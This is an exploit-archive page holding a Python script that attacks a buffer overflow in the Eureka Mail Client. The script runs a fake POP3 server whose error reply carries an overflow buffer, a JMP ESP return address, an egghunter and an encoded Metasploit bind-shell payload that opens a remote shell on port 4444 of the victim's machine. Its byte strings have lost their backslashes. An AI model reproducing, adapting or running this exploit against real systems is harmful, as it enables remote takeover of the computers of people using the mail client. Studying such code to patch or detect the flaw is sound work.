Eureka Mail Client Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Eureka Mail Client Remote Buffer Overflow Exploit
# Published : 2009-11-26
# Author : Dr_IDE and dookie
# Previous Title : Golden FTP Server 4.30 File Deletion Vulnerability
# Next Title : Novell eDirectory 8.8 SP5 iConsole Buffer Overflow

#!/usr/bin/env python
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
##########################################################

import sys, socket

# egghunter (32 bytes)
egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x77x30x30x74" # this is the egg: w00t
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444

bindshell = ("xbbxd3x82x28x36xd9xc6xd9x74x24xf4x5ex2bxc9xb1"
"x56x83xeexfcx31x5ex0fx03x5exdcx60xddxcax0axed"
"x1ex33xcax8ex97xd6xfbx9cxccx93xa9x10x86xf6x41"
"xdaxcaxe2xd2xaexc2x05x53x04x35x2bx64xa8xf9xe7"
"xa6xaax85xf5xfax0cxb7x35x0fx4cxf0x28xffx1cxa9"
"x27xadxb0xdex7ax6dxb0x30xf1xcdxcax35xc6xb9x60"
"x37x17x11xfex7fx8fx1ax58xa0xaexcfxbax9cxf9x64"
"x08x56xf8xacx40x97xcax90x0fxa6xe2x1dx51xeexc5"
"xfdx24x04x36x80x3exdfx44x5excaxc2xefx15x6cx27"
"x11xfaxebxacx1dxb7x78xeax01x46xacx80x3exc3x53"
"x47xb7x97x77x43x93x4cx19xd2x79x23x26x04x25x9c"
"x82x4exc4xc9xb5x0cx81x3ex88xaex51x28x9bxddx63"
"xf7x37x4axc8x70x9ex8dx2fxabx66x01xcex53x97x0b"
"x15x07xc7x23xbcx27x8cxb3x41xf2x03xe4xedxacxe3"
"x54x4ex1cx8cxbex41x43xacxc0x8bxf2xeax0exefx57"
"x9dx72x0fx46x01xfaxe9x02xa9xaaxa2xbax0bx89x7a"
"x5dx73xfbxd6xf6xe3xb3x30xc0x0cx44x17x63xa0xec"
"xf0xf7xaax28xe0x08xe7x18x6bx31x60xd2x05xf0x10"
"xe3x0fx62xb0x76xd4x72xbfx6ax43x25xe8x5dx9axa3"
"x04xc7x34xd1xd4x91x7fx51x03x62x81x58xc6xdexa5"
"x4ax1exdexe1x3excex89xbfxe8xa8x63x0ex42x63xdf"
"xd8x02xf2x13xdbx54xfbx79xadxb8x4axd4xe8xc7x63"
"xb0xfcxb0x99x20x02x6bx1ax40xe1xb9x57xe9xbcx28"
"xdax74x3fx87x19x81xbcx2dxe2x76xdcx44xe7x33x5a"
"xb5x95x2cx0fxb9x0ax4cx1a")

buff = ("x41" * 710);
retn = ("x53x93x42x7e"); #JMP ESP USER32.DLL XPSP3
nops = ("x90" * 218);
junk = ("xcc" * 2000);
sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);

print ("""
##########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3)
# Coded By: Dr_IDE and dookie2000ca
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3
# Note: This script sets up a fake SMTP server
# Note: Point the client to this address and check your mail
#
##########################################################
""")

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind(('', 110))
	s.listen(1)
	print ("[*] Listening on port 110.")
	print ("[*] Have someone connect to you.")
	print ("[*] Type <control>-c to exit.")
	conn, addr = s.accept()
	print '[*] Received connection from: ', addr

	while 1:
		conn.send(sploit)
	conn.close()
except:
	print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")